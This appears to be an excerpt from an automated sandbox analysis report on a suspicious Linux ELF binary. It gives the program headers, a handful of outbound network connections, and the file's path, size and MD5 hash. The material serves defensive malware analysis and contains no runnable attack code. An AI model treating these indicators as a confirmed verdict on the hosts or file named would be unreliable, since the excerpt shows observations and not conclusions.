                                                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                  LOAD0x00x100000000x100000000x2038c0x2038c6.24790x5R E0x10000.init .text .fini .rodata
                                                                                  LOAD0x203900x100303900x1003038c0x47c80x190c00.49460x6RW 0x10000.ctors .dtors .data .sdata .sbss .bss
                                                                                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Apr 19, 2024 13:14:43.102163076 CEST43928443192.168.2.2391.189.91.42
                                                                                  Apr 19, 2024 13:14:48.733375072 CEST42836443192.168.2.2391.189.91.43
                                                                                  Apr 19, 2024 13:14:50.013324976 CEST4251680192.168.2.23109.202.202.202
                                                                                  Apr 19, 2024 13:15:03.579432964 CEST43928443192.168.2.2391.189.91.42
                                                                                  Apr 19, 2024 13:15:15.865647078 CEST42836443192.168.2.2391.189.91.43
                                                                                  Apr 19, 2024 13:15:19.961108923 CEST4251680192.168.2.23109.202.202.202
                                                                                  Apr 19, 2024 13:15:44.533885956 CEST43928443192.168.2.2391.189.91.42

                                                                                  System Behavior

                                                                                  Start time (UTC):11:14:43
                                                                                  Start date (UTC):19/04/2024
                                                                                  Path:/tmp/pXwuZJXauT.elf
                                                                                  Arguments:/tmp/pXwuZJXauT.elf
                                                                                  File size:5388968 bytes
                                                                                  MD5 hash:ae65271c943d3451b7f026d1fadccea6